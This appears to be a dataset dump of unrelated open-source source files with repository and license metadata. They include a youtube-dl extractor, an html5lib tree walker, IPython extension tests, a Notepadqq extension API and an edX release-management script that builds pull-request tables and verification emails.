42 selectApplet(c, '', logCh) try: iin = findTLValue(getData(c, T_IIN), (T_IIN,)) except ISOException: iin = None try: cin = findTLValue(getData(c, T_CIN), (T_CIN,)) except ISOException: cin = None return histBytes, iccid, dirDO, imsi, iin, cin
lgpl-2.1
linglung/ytdl
youtube_dl/extractor/playtvak.py
36
6794
# coding: utf-8 from __future__ import unicode_literals from .common import InfoExtractor from ..compat import ( compat_urlparse, compat_urllib_parse_urlencode, ) from ..utils import ( ExtractorError, int_or_none, parse_iso8601, qualities, ) class PlaytvakIE(InfoExtractor): IE_DESC = 'Playtvak.cz, iDNES.cz and Lidovky.cz' _VALID_URL = r'https?://(?:.+?\.)?(?:playtvak|idnes|lidovky|metro)\.cz/.*\?(?:c|idvideo)=(?P<id>[^&]+)' _TESTS = [{ 'url': 'http://www.playtvak.cz/vyzente-vosy-a-srsne-ze-zahrady-dn5-/hodinovy-manzel.aspx?c=A150730_150323_hodinovy-manzel_kuko', 'md5': '4525ae312c324b4be2f4603cc78ceb4a', 'info_dict': { 'id': 'A150730_150323_hodinovy-manzel_kuko', 'ext': 'mp4', 'title': 'Vyžeňte vosy a sršně ze zahrady', 'description': 'md5:f93d398691044d303bc4a3de62f3e976', 'thumbnail': r're:(?i)^https?://.*\.(?:jpg|png)$', 'duration': 279, 'timestamp': 1438732860, 'upload_date': '20150805', 'is_live': False, } }, { # live video test 'url': 'http://slowtv.playtvak.cz/planespotting-0pr-/planespotting.aspx?c=A150624_164934_planespotting_cat', 'info_dict': { 'id': 'A150624_164934_planespotting_cat', 'ext': 'flv', 'title': 're:^Přímý přenos iDNES.cz [0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}$', 'description': 'Sledujte provoz na ranveji Letiště Václava Havla v Praze', 'thumbnail': r're:(?i)^https?://.*\.(?:jpg|png)$', 'is_live': True, }, 'params': { 'skip_download': True, # requires rtmpdump }, }, { # idnes.cz 'url': 'http://zpravy.idnes.cz/pes-zavreny-v-aute-rozbijeni-okynek-v-aute-fj5-/domaci.aspx?c=A150809_104116_domaci_pku', 'md5': '819832ba33cd7016e58a6658577fe289', 'info_dict': { 'id': 'A150809_104116_domaci_pku', 'ext': 'mp4', 'title': 'Zavřeli jsme mraženou pizzu do auta. 
Upekla se', 'description': 'md5:01e73f02329e2e5760bd5eed4d42e3c2', 'thumbnail': r're:(?i)^https?://.*\.(?:jpg|png)$', 'duration': 39, 'timestamp': 1438969140, 'upload_date': '20150807', 'is_live': False, } }, { # lidovky.cz 'url': 'http://www.lidovky.cz/dalsi-demonstrace-v-praze-o-migraci-duq-/video.aspx?c=A150808_214044_ln-video_ELE', 'md5': 'c7209ac4ba9d234d4ad5bab7485bcee8', 'info_dict': { 'id': 'A150808_214044_ln-video_ELE', 'ext': 'mp4', 'title': 'Táhni! Demonstrace proti imigrantům budila emoce', 'description': 'md5:97c81d589a9491fbfa323c9fa3cca72c', 'thumbnail': r're:(?i)^https?://.*\.(?:jpg|png)$', 'timestamp': 1439052180, 'upload_date': '20150808', 'is_live': False, } }, { # metro.cz 'url': 'http://www.metro.cz/video-pod-billboardem-se-na-vltavske-roztocil-kolotoc-deti-vozil-jen-par-hodin-1hx-/metro-extra.aspx?c=A141111_173251_metro-extra_row', 'md5': '84fc1deedcac37b7d4a6ccae7c716668', 'info_dict': { 'id': 'A141111_173251_metro-extra_row', 'ext': 'mp4', 'title': 'Recesisté udělali z billboardu kolotoč', 'description': 'md5:7369926049588c3989a66c9c1a043c4c', 'thumbnail': r're:(?i)^https?://.*\.(?:jpg|png)$', 'timestamp': 1415725500, 'upload_date': '20141111', 'is_live': False, } }, { 'url': 'http://www.playtvak.cz/embed.aspx?idvideo=V150729_141549_play-porad_kuko', 'only_matching': True, }] def _real_extract(self, url): video_id = self._match_id(url) webpage = self._download_webpage(url, video_id) info_url = self._html_search_regex( r'Misc\.videoFLV\(\s*{\s*data\s*:\s*"([^"]+)"', webpage, 'info url') parsed_url = compat_urlparse.urlparse(info_url) qs = compat_urlparse.parse_qs(parsed_url.query) qs.update({ 'reklama': ['0'], 'type': ['js'], }) info_url = compat_urlparse.urlunparse( parsed_url._replace(query=compat_urllib_parse_urlencode(qs, True))) json_info = self._download_json( info_url, video_id, transform_source=lambda s: s[s.index('{'):s.rindex('}') + 1]) item = None for i in json_info['items']: if i.get('type') == 'video' or i.get('type') == 
'stream': item = i break if not item: raise ExtractorError('No suitable stream found') quality = qualities(('low', 'middle', 'high')) formats = [] for fmt in item['video']: video_url = fmt.get('file') if not video_url: continue format_ = fmt['format'] format_id = '%s_%s' % (format_, fmt['quality']) preference = None if format_ in ('mp4', 'webm'): ext = format_ elif format_ == 'rtmp': ext = 'flv' elif format_ == 'apple': ext = 'mp4' # Some streams have mp3 audio which does not play # well with ffmpeg filter aac_adtstoasc preference = -1 elif format_ == 'adobe': # f4m manifest fails with 404 in 80% of requests continue else: # Other formats not supported yet continue formats.append({ 'url': video_url, 'ext': ext, 'format_id': format_id, 'quality': quality(fmt.get('quality')), 'preference': preference, }) self._sort_formats(formats) title = item['title'] is_live = item['type'] == 'stream' if is_live: title = self._live_title(title) description = self._og_search_description(webpage, default=None) or self._html_search_meta( 'description', webpage, 'description') timestamp = None duration = None if not is_live: duration = int_or_none(item.get('length')) timestamp = item.get('published') if timestamp: timestamp = parse_iso8601(timestamp[:-5]) return { 'id': video_id, 'title': title, 'description': description, 'thumbnail': item.get('image'), 'duration': duration, 'timestamp': timestamp, 'is_live': is_live, 'formats': formats, }
unlicense
xkcd1253/SocialNetworkforTwo
flask/lib/python2.7/site-packages/pip-1.4.1-py2.7.egg/pip/vendor/html5lib/treewalkers/genshistream.py
1730
2278
from __future__ import absolute_import, division, unicode_literals from genshi.core import QName from genshi.core import START, END, XML_NAMESPACE, DOCTYPE, TEXT from genshi.core import START_NS, END_NS, START_CDATA, END_CDATA, PI, COMMENT from . import _base from ..constants import voidElements, namespaces class TreeWalker(_base.TreeWalker): def __iter__(self): # Buffer the events so we can pass in the following one previous = None for event in self.tree: if previous is not None: for token in self.tokens(previous, event): yield token previous = event # Don't forget the final event! if previous is not None: for token in self.tokens(previous, None): yield token def tokens(self, event, next): kind, data, pos = event if kind == START: tag, attribs = data name = tag.localname namespace = tag.namespace converted_attribs = {} for k, v in attribs: if isinstance(k, QName): converted_attribs[(k.namespace, k.localname)] = v else: converted_attribs[(None, k)] = v if namespace == namespaces["html"] and name in voidElements: for token in self.emptyTag(namespace, name, converted_attribs, not next or next[0] != END or next[1] != tag): yield token else: yield self.startTag(namespace, name, converted_attribs) elif kind == END: name = data.localname namespace = data.namespace if name not in voidElements: yield self.endTag(namespace, name) elif kind == COMMENT: yield self.comment(data) elif kind == TEXT: for token in self.text(data): yield token elif kind == DOCTYPE: yield self.doctype(*data) elif kind in (XML_NAMESPACE, DOCTYPE, START_NS, END_NS, START_CDATA, END_CDATA, PI): pass else: yield self.unknown(kind)
gpl-2.0
Split-Screen/android_kernel_lge_gee
tools/perf/python/twatch.py
7370
1334
#! /usr/bin/python # -*- python -*- # -*- coding: utf-8 -*- # twatch - Experimental use of the perf python interface # Copyright (C) 2011 Arnaldo Carvalho de Melo <acme@redhat.com> # # This application is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; version 2. # # This application is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. import perf def main(): cpus = perf.cpu_map() threads = perf.thread_map() evsel = perf.evsel(task = 1, comm = 1, mmap = 0, wakeup_events = 1, watermark = 1, sample_id_all = 1, sample_type = perf.SAMPLE_PERIOD | perf.SAMPLE_TID | perf.SAMPLE_CPU | perf.SAMPLE_TID) evsel.open(cpus = cpus, threads = threads); evlist = perf.evlist(cpus, threads) evlist.add(evsel) evlist.mmap() while True: evlist.poll(timeout = -1) for cpu in cpus: event = evlist.read_on_cpu(cpu) if not event: continue print "cpu: %2d, pid: %4d, tid: %4d" % (event.sample_cpu, event.sample_pid, event.sample_tid), print event if __name__ == '__main__': main()
gpl-2.0
maljac/odoomrp-wip
mrp_bom_by_percentage/__openerp__.py
18
1240
# -*- encoding: utf-8 -*- ############################################################################## # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see http://www.gnu.org/licenses/. # ############################################################################## { "name": "MRP BoM By Percentage", "version": "1.0", "author": "OdooMRP team," "AvanzOSC," "Serv. Tecnol. Avanzados - Pedro M. Baeza", "category": "Manufacturing", "website": "http://www.odoomrp.com", "depends": [ "mrp", ], "data": [ "views/mrp_bom_view.xml", ], "installable": True }
agpl-3.0
xerond/lucia
ledEditor/cfilegen.py
1
2560
from effectgroup import EffectGroup from effectdescriptions import EffectDescriptions from myutils import Utils def generateFile(fileName,ledCount,effectGroups): f = open(fileName,'w') f.write("#ifndef H_SONG_INSTRUCTIONS\n#define H_SONG_INSTRUCTIONS\n#include \"avr/pgmspace.h\"\n#include \"song_instructions.h\"\nconst char song_instructions[] PROGMEM = {") lastTime = 0 for curEffectGroup in effectGroups: writeBuffer = "" newTime = curEffectGroup.getTimeAs10msCount() tD = newTime - lastTime lastTime = newTime writeBuffer += "0xff,\n" writeBuffer += Utils.short_to_hex(tD) + "\n" for ledIndex in range (0,ledCount): ledEffect = curEffectGroup.getLedEffect(ledIndex) tempLedBytes = generateLedEffectBytes(ledIndex,ledEffect) if tempLedBytes <> "": writeBuffer += "\t" + generateLedEffectBytes(ledIndex,ledEffect) + "\n" writeBuffer += "0xff,\n" f.write(writeBuffer) f.write("0x00,};\n#endif") #generates a string for led effect def generateLedEffectBytes(ledNumber,ledEffect): effectNumber = ledEffect[EffectGroup.INDEX_EFFECT_NUMBER] #get the real effect number #TODO we are accessing a global here, eek! 
print "Effect num is: " + str(effectNumber) realEffectNumber = EffectDescriptions.quickEffectLookup[effectNumber]['realId'] effectData = ledEffect[EffectGroup.INDEX_EFFECT_DATA] #if effect number is < 0, ignore it if effectNumber < 0: return "" returnStr = Utils.byte_to_hex(ledNumber) + Utils.byte_to_hex(realEffectNumber) #get the effect description effectDescr = EffectDescriptions.quickEffectLookup[effectNumber] #Depending on the data, time to output the values accordingly reqAttributes = effectDescr['reqAttributes'] attribCount = len(reqAttributes) for i in range (0,attribCount): curAttrib = reqAttributes[i] attribType = curAttrib[EffectDescriptions.INDEX_TYPE] curData = effectData[i] if(attribType == EffectDescriptions.VAR_COLOR): returnStr += Utils.short_to_hex(curData[0]) returnStr += Utils.short_to_hex(curData[1]) returnStr += Utils.short_to_hex(curData[2]) elif(attribType == EffectDescriptions.VAR_BYTE): returnStr += Utils.byte_to_hex(int(curData)) elif(attribType == EffectDescriptions.VAR_WORD): returnStr += Utils.short_to_hex(int(curData)) elif(attribType == EffectDescriptions.VAR_DWORD): returnStr += Utils.dword_to_hex(int(curData)) elif(attribType == EffectDescriptions.VAR_HIDDEN_BYTE): returnStr += Utils.short_to_hex(int(curData)) else: print "ERROR! COULD NOT DECODE EFFECT!" return returnStr
mit
initNirvana/Easyphotos
env/lib/python3.4/site-packages/IPython/core/tests/test_extension.py
36
3025
import os.path import nose.tools as nt import IPython.testing.tools as tt from IPython.utils.syspathcontext import prepended_to_syspath from IPython.utils.tempdir import TemporaryDirectory ext1_content = """ def load_ipython_extension(ip): print("Running ext1 load") def unload_ipython_extension(ip): print("Running ext1 unload") """ ext2_content = """ def load_ipython_extension(ip): print("Running ext2 load") """ ext3_content = """ def load_ipython_extension(ip): ip2 = get_ipython() print(ip is ip2) """ def test_extension_loading(): em = get_ipython().extension_manager with TemporaryDirectory() as td: ext1 = os.path.join(td, 'ext1.py') with open(ext1, 'w') as f: f.write(ext1_content) ext2 = os.path.join(td, 'ext2.py') with open(ext2, 'w') as f: f.write(ext2_content) with prepended_to_syspath(td): assert 'ext1' not in em.loaded assert 'ext2' not in em.loaded # Load extension with tt.AssertPrints("Running ext1 load"): assert em.load_extension('ext1') is None assert 'ext1' in em.loaded # Should refuse to load it again with tt.AssertNotPrints("Running ext1 load"): assert em.load_extension('ext1') == 'already loaded' # Reload with tt.AssertPrints("Running ext1 unload"): with tt.AssertPrints("Running ext1 load", suppress=False): em.reload_extension('ext1') # Unload with tt.AssertPrints("Running ext1 unload"): assert em.unload_extension('ext1') is None # Can't unload again with tt.AssertNotPrints("Running ext1 unload"): assert em.unload_extension('ext1') == 'not loaded' assert em.unload_extension('ext2') == 'not loaded' # Load extension 2 with tt.AssertPrints("Running ext2 load"): assert em.load_extension('ext2') is None # Can't unload this assert em.unload_extension('ext2') == 'no unload function' # But can reload it with tt.AssertPrints("Running ext2 load"): em.reload_extension('ext2') def test_extension_builtins(): em = get_ipython().extension_manager with TemporaryDirectory() as td: ext3 = os.path.join(td, 'ext3.py') with open(ext3, 'w') as f: f.write(ext3_content) 
assert 'ext3' not in em.loaded with prepended_to_syspath(td): # Load extension with tt.AssertPrints("True"): assert em.load_extension('ext3') is None assert 'ext3' in em.loaded def test_non_extension(): em = get_ipython().extension_manager nt.assert_equal(em.load_extension('sys'), "no load function")
mit
notepadqq/NotepadqqApi_Python
notepadqq_api/notepadqq_api.py
1
3531
import asyncio import sys from notepadqq_api.message_channel import MessageChannel from notepadqq_api.message_interpreter import MessageInterpreter from notepadqq_api.stubs import Stubs class NotepadqqApi(): """Provides access to the Notepadqq Api.""" _NQQ_STUB_ID = 1 def __init__(self, socket_path=None, extension_id=None): """Construct a new Api object that can be used to invoke Notepadqq methods and to receive its events. If not provided, socket_path and extension_id are respectively sys.argv[1] and sys.argv[2] """ if socket_path is None: try: socket_path = sys.argv[1] except IndexError: raise ValueError("Socket path not provided") if extension_id is None: try: extension_id = sys.argv[2] except IndexError: raise ValueError("Extension id not provided") self._socket_path = socket_path self._extension_id = extension_id self._message_channel = MessageChannel(self._socket_path) self._message_interpreter = MessageInterpreter(self._message_channel) self._nqq = Stubs.Notepadqq(self._message_interpreter, self._NQQ_STUB_ID) def run_event_loop(self, started_callback=None): """Start the event loop. If started_callback is provided, it will be called as soon as the connection with Notepadqq is ready. """ if started_callback is not None: self.notepadqq.on('currentExtensionStarted', started_callback) loop = asyncio.get_event_loop() loop.run_until_complete(self._message_channel.start(loop, self._on_new_message)) @property def extension_id(self): """The id assigned to this extension by Notepadqq""" return self._extension_id @property def notepadqq(self): """Get an instance of the main Notepadqq object""" return self._nqq def on_window_created(self, callback): """Execute a callback for every new window. This is preferable to the "newWindow" event of Notepadqq, because it could happen that the extension isn't ready soon enough to receive the "newWindow" event for the first window. 
This method, instead, ensures that the passed callback will be called once and only once for each current or future window. """ captured_windows = [] # Invoke the callback for every currently open window for window in self.notepadqq.windows(): if window not in captured_windows: captured_windows.append(window) callback(window) # Each time a new window gets opened, invoke the callback. # When Notepadqq is starting and initializing all the extensions, # we might not be fast enough to receive this event: this is why # we manually invoked the callback for every currently open window. def on_new_window(window): if window not in captured_windows: callback(window) self.notepadqq.on('newWindow', on_new_window) def for_each_window(self, f): """Decorator alternative for self.on_window_created(f)""" self.on_window_created(f) return f def _on_new_message(self, msg): # Called whenever a new message is received from the channel self._message_interpreter.process_message(msg)
mit
deepsrijit1105/edx-platform
scripts/release.py
37
20364
#!/usr/bin/env python """ a release-master multitool """ from __future__ import print_function, unicode_literals import sys import argparse from datetime import date, timedelta import re import collections import functools import textwrap import json import getpass try: from path import Path as path from git import Repo, Commit from git.refs.symbolic import SymbolicReference from dateutil.parser import parse as parse_datestring import requests import yaml except ImportError: print("Error: missing dependencies! Please run this command to install them:") print("pip install path.py requests python-dateutil GitPython PyYAML") sys.exit(1) try: from pygments.console import colorize except ImportError: colorize = lambda color, text: text JIRA_RE = re.compile(r"\b[A-Z]{2,}-\d+\b") PR_BRANCH_RE = re.compile(r"remotes/edx/pr/(\d+)") def project_root(): directory = path(__file__).abspath().dirname() while not (directory / ".git").exists(): directory = directory.parent return directory PROJECT_ROOT = project_root() repo = Repo(PROJECT_ROOT) git = repo.git PEOPLE_YAML = "https://raw.githubusercontent.com/edx/repo-tools-data/master/people.yaml" class memoized(object): """ Decorator. Caches a function's return value each time it is called. If called later with the same arguments, the cached value is returned (not reevaluated). https://wiki.python.org/moin/PythonDecoratorLibrary#Memoize """ def __init__(self, func): self.func = func self.cache = {} def __call__(self, *args): if not isinstance(args, collections.Hashable): # uncacheable. a list, for instance. # better to not cache than blow up. 
return self.func(*args) if args in self.cache: return self.cache[args] else: value = self.func(*args) self.cache[args] = value return value def __repr__(self): '''Return the function's docstring.''' return self.func.__doc__ def __get__(self, obj, objtype): '''Support instance methods.''' return functools.partial(self.__call__, obj) def make_parser(): parser = argparse.ArgumentParser(description="release master multitool") parser.add_argument( '--previous', '--prev', '-p', metavar="GITREV", default="edx/release", help="previous release [%(default)s]") parser.add_argument( '--current', '--curr', '-c', metavar="GITREV", default="HEAD", help="current release candidate [%(default)s]") parser.add_argument( '--date', '-d', help="expected release date: defaults to " "next Tuesday [{}]".format(default_release_date())) parser.add_argument( '--merge', '-m', action="store_true", default=False, help="include merge commits") parser.add_argument( '--table', '-t', action="store_true", default=False, help="only print table") return parser def ensure_pr_fetch(): """ Make sure that the git repository contains a remote called "edx" that has two fetch URLs; one for the main codebase, and one for pull requests. Returns True if the environment was modified in any way, False otherwise. """ modified = False remotes = git.remote().splitlines() if 'edx' not in remotes: git.remote("add", "edx", "https://github.com/edx/edx-platform.git") modified = True # it would be nice to use the git-python API to do this, but it doesn't seem # to support configurations with more than one value per key. :( edx_fetches = git.config("remote.edx.fetch", get_all=True).splitlines() pr_fetch = '+refs/pull/*/head:refs/remotes/edx/pr/*' if pr_fetch not in edx_fetches: git.config("remote.edx.fetch", pr_fetch, add=True) modified = True git.fetch("edx") return modified def get_github_creds(): """ Returns GitHub credentials if they exist, as a two-tuple of (username, token). Otherwise, return None. 
""" netrc_auth = requests.utils.get_netrc_auth("https://api.github.com") if netrc_auth: return netrc_auth config_file = path("~/.config/edx-release").expand() if config_file.isfile(): with open(config_file) as f: config = json.load(f) github_creds = config.get("credentials", {}).get("api.github.com", {}) username = github_creds.get("username", "") token = github_creds.get("token", "") if username and token: return (username, token) return None def create_github_creds(): """ https://developer.github.com/v3/oauth_authorizations/#create-a-new-authorization """ headers = {"User-Agent": "edx-release"} payload = { "note": "edx-release", "scopes": ["repo"], } username = raw_input("GitHub username: ") password = getpass.getpass("GitHub password: ") response = requests.post( "https://api.github.com/authorizations", auth=(username, password), headers=headers, data=json.dumps(payload), ) # is the user using two-factor authentication? otp_header = response.headers.get("X-GitHub-OTP") if not response.ok and otp_header and otp_header.startswith("required;"): # get two-factor code, redo the request headers["X-GitHub-OTP"] = raw_input("Two-factor authentication code: ") response = requests.post( "https://api.github.com/authorizations", auth=(username, password), headers=headers, data=json.dumps(payload), ) if not response.ok: message = response.json()["message"] if message != "Validation Failed": raise requests.exceptions.RequestException(message) else: # A token called "edx-release" already exists on GitHub. # Delete it, and try again. 
token_id = get_github_auth_id(username, password, "edx-release") if token_id: delete_github_auth_token(username, password, token_id) response = requests.post( "https://api.github.com/authorizations", auth=(username, password), headers=headers, data=json.dumps(payload), ) if not response.ok: message = response.json()["message"] raise requests.exceptions.RequestException(message) return (username, response.json()["token"]) def get_github_auth_id(username, password, note): """ Return the ID associated with the GitHub auth token with the given note. If no such auth token exists, return None. """ response = requests.get( "https://api.github.com/authorizations", auth=(username, password), headers={"User-Agent": "edx-release"}, ) if not response.ok: message = response.json()["message"] raise requests.exceptions.RequestException(message) for auth_token in response.json(): if auth_token["note"] == "edx-release": return auth_token["id"] return None def delete_github_auth_token(username, password, token_id): response = requests.delete( "https://api.github.com/authorizations/{id}".format(id=token_id), auth=(username, password), headers={"User-Agent": "edx-release"}, ) if not response.ok: message = response.json()["message"] raise requests.exceptions.RequestException(message) def ensure_github_creds(attempts=3): """ Make sure that we have GitHub OAuth credentials. This will check the user's .netrc file, as well as the ~/.config/edx-release file. If no credentials exist in either place, it will prompt the user to create OAuth credentials, and store them in ~/.config/edx-release. Returns False if we found credentials, True if we had to create them. """ if get_github_creds(): return False # Looks like we need to create the OAuth creds print("We need to set up OAuth authentication with GitHub's API. 
" "Your password will not be stored.", file=sys.stderr) token = None for _ in range(attempts): try: username, token = create_github_creds() except requests.exceptions.RequestException as e: print( "Invalid authentication: {}".format(e.message), file=sys.stderr, ) continue else: break if token: print("Successfully authenticated to GitHub", file=sys.stderr) if not token: print("Too many invalid authentication attempts.", file=sys.stderr) return False config_file = path("~/.config/edx-release").expand() # make sure parent directory exists config_file.parent.makedirs_p() # read existing config if it exists if config_file.isfile(): with open(config_file) as f: config = json.load(f) else: config = {} # update config if 'credentials' not in config: config["credentials"] = {} if 'api.github.com' not in config['credentials']: config["credentials"]["api.github.com"] = {} config["credentials"]["api.github.com"]["username"] = username config["credentials"]["api.github.com"]["token"] = token # write it back out with open(config_file, "w") as f: json.dump(config, f) return True def default_release_date(): """ Returns a date object corresponding to the expected date of the next release: normally, this Tuesday. """ today = date.today() TUESDAY = 2 days_until_tuesday = (TUESDAY - today.isoweekday()) % 7 return today + timedelta(days=days_until_tuesday) def parse_ticket_references(text): """ Given a commit message, return a list of all JIRA ticket references in that message. If there are no ticket references, return an empty list. """ return set(JIRA_RE.findall(text)) class DoesNotExist(Exception): def __init__(self, message, commit, branch): self.message = message self.commit = commit self.branch = branch Exception.__init__(self, message) def get_merge_commit(commit, branch="master"): """ Given a commit that was merged into the given branch, return the merge commit for that event. 
http://stackoverflow.com/questions/8475448/find-merge-commit-which-include-a-specific-commit """ commit_range = "{}..{}".format(commit, branch) ancestry_paths = git.rev_list(commit_range, ancestry_path=True).splitlines() first_parents = git.rev_list(commit_range, first_parent=True).splitlines() both = set(ancestry_paths) & set(first_parents) for commit_hash in reversed(ancestry_paths): if commit_hash in both: return repo.commit(commit_hash) # no merge commit! msg = "No merge commit for {commit} in {branch}!".format( commit=commit, branch=branch, ) raise DoesNotExist(msg, commit, branch) def get_pr_info(num): """ Returns the info from the GitHub API """ url = "https://api.github.com/repos/edx/edx-platform/pulls/{num}".format(num=num) username, token = get_github_creds() headers = { "Authorization": "token {}".format(token), "User-Agent": "edx-release", } response = requests.get(url, headers=headers) result = response.json() if not response.ok: raise requests.exceptions.RequestException(result["message"]) return result def get_merged_prs(start_ref, end_ref): """ Return the set of all pull requests (as integers) that were merged between the start_ref and end_ref. 
""" ensure_pr_fetch() start_unmerged_branches = set( branch.strip() for branch in git.branch(all=True, no_merged=start_ref).splitlines() ) end_merged_branches = set( branch.strip() for branch in git.branch(all=True, merged=end_ref).splitlines() ) merged_between_refs = start_unmerged_branches & end_merged_branches merged_prs = set() for branch in merged_between_refs: match = PR_BRANCH_RE.search(branch) if match: merged_prs.add(int(match.group(1))) return merged_prs @memoized def prs_by_email(start_ref, end_ref): """ Returns an ordered dictionary of {email: pr_list} Email is the email address of the person who merged the pull request The dictionary is alphabetically ordered by email address The pull request list is ordered by merge date """ username, token = get_github_creds() headers = { "Authorization": "token {}".format(token), "User-Agent": "edx-release", } # `emails` maps from other_emails to primary email, based on people.yaml. emails = {} people_resp = requests.get(PEOPLE_YAML, headers=headers) people_resp.raise_for_status() people = yaml.safe_load(people_resp.text) for person in people.itervalues(): if 'other_emails' in person: for other_email in person['other_emails']: emails[other_email] = person['email'] unordered_data = collections.defaultdict(set) for pr_num in get_merged_prs(start_ref, end_ref): ref = "refs/remotes/edx/pr/{num}".format(num=pr_num) branch = SymbolicReference(repo, ref) try: merge = get_merge_commit(branch.commit, end_ref) except DoesNotExist: pass # this commit will be included in the commits_without_prs table else: email = emails.get(merge.author.email, merge.author.email) if email.endswith("@users.noreply.github.com"): # A bogus GitHub address, look up their GitHub name in # people.yaml username = email.split("@")[0] try: email = people[username]['email'] except KeyError: pass unordered_data[email].add((pr_num, merge)) ordered_data = collections.OrderedDict() for email in sorted(unordered_data.keys()): ordered = 
sorted(unordered_data[email], key=lambda pair: pair[1].authored_date) ordered_data[email] = [num for num, merge in ordered] return ordered_data def generate_pr_table(start_ref, end_ref): """ Return a UTF-8 string corresponding to a pull request table to embed in Confluence. """ header = "|| Merged By || Author || Title || PR || JIRA || Release Notes? || Verified? ||" pr_link = "[#{num}|https://github.com/edx/edx-platform/pull/{num}]" user_link = "[@{user}|https://github.com/{user}]" rows = [header] prbe = prs_by_email(start_ref, end_ref) for email, pull_requests in prbe.items(): for i, pull_request in enumerate(pull_requests): try: pr_info = get_pr_info(pull_request) title = pr_info["title"] or "" body = pr_info["body"] or "" author = pr_info["user"]["login"] except requests.exceptions.RequestException as e: message = ( "Warning: could not fetch data for #{num}: " "{message}".format(num=pull_request, message=e.message) ) print(colorize("red", message), file=sys.stderr) title = "?" body = "?" author = "" rows.append("| {merged_by} | {author} | {title} | {pull_request} | {jira} | {release_notes} | {verified} |".format( merged_by=email if i == 0 else "", author=user_link.format(user=author) if author else "", title=title.replace("|", "\|").replace('{', '\{').replace('}', '\}'), pull_request=pr_link.format(num=pull_request), jira=", ".join(parse_ticket_references(body)), release_notes="", verified="", )) return "\n".join(rows).encode("utf8") @memoized def get_commits_not_in_prs(start_ref, end_ref): """ Return a tuple of commits that exist between start_ref and end_ref, but were not merged to the end_ref. If everyone is following the pull request process correctly, this should return an empty tuple. """ return tuple(Commit.iter_items( repo, "{start}..{end}".format(start=start_ref, end=end_ref), first_parent=True, no_merges=True, )) def generate_commit_table(start_ref, end_ref): """ Return a string corresponding to a commit table to embed in Comfluence. 
The commits in the table should only be commits that are not in the pull request table. """ header = "|| Author || Summary || Commit || JIRA || Release Notes? || Verified? ||" commit_link = "[commit|https://github.com/edx/edx-platform/commit/{sha}]" rows = [header] commits = get_commits_not_in_prs(start_ref, end_ref) for commit in commits: rows.append("| {author} | {summary} | {commit} | {jira} | {release_notes} | {verified} |".format( author=commit.author.email, summary=commit.summary.replace("|", "\|"), commit=commit_link.format(sha=commit.hexsha), jira=", ".join(parse_ticket_references(commit.message)), release_notes="", verified="", )) return "\n".join(rows) def generate_email(start_ref, end_ref, release_date=None): """ Returns a string roughly approximating an email. """ if release_date is None: release_date = default_release_date() prbe = prs_by_email(start_ref, end_ref) email = """ To: {emails} You merged at least one pull request for edx-platform that is going out in this upcoming release, and you are responsible for verifying those changes on the staging servers before the code is released. Please go to the release page to do so: https://openedx.atlassian.net/wiki/display/ENG/{date}+Release The staging server is: https://stage.edx.org Note that you are responsible for verifying any pull requests that you merged, whether you wrote the code or not. (If you didn't write the code, you can and should try to get the person who wrote the code to help verify the changes -- but even if you can't, you're still responsible!) If you find any bugs, please notify me and record the bugs on the release page. Thanks! By the way, if you have an @edx.org email address and are having trouble logging into stage, you may need to reset your password. If you would prefer this email be sent to a different email address of yours, send a request to oscm@edx.org with the details. 
""".format( emails=", ".join(prbe.keys()), date=release_date.isoformat(), ) return textwrap.dedent(email).strip() def main(): parser = make_parser() args = parser.parse_args() if isinstance(args.date, basestring): # user passed in a custom date, so we need to parse it args.date = parse_datestring(args.date).date() ensure_github_creds() if args.table: print(generate_pr_table(args.previous, args.current)) return print("Generating stage verification email and its list of recipients. This may take around a minute...") print(generate_email(args.previous, args.current, release_date=args.date).encode('UTF-8')) print("\n") print("Wiki Table:") print( "Type Ctrl+Shift+D on Confluence to embed the following table " "in your release wiki page" ) print("\n") print(generate_pr_table(args.previous, args.current)) commits_without_prs = get_commits_not_in_prs(args.previous, args.current) if commits_without_prs: num = len(commits_without_prs) plural = num > 1 print("\n") print( "There {are} {num} {commits} in this release that did not come in " "through pull requests!".format( num=num, are="are" if plural else "is", commits="commits" if plural else "commit" ) ) print("\n") print(generate_commit_table(args.previous, args.current)) if __name__ == "__main__": main()
agpl-3.0
VinceZK/phantomjs
src/qt/qtwebkit/Tools/Scripts/webkitpy/common/checkout/checkout.py
119
9383
# Copyright (c) 2010 Google Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import StringIO from webkitpy.common.config import urls from webkitpy.common.checkout.changelog import ChangeLog, parse_bug_id_from_changelog from webkitpy.common.checkout.commitinfo import 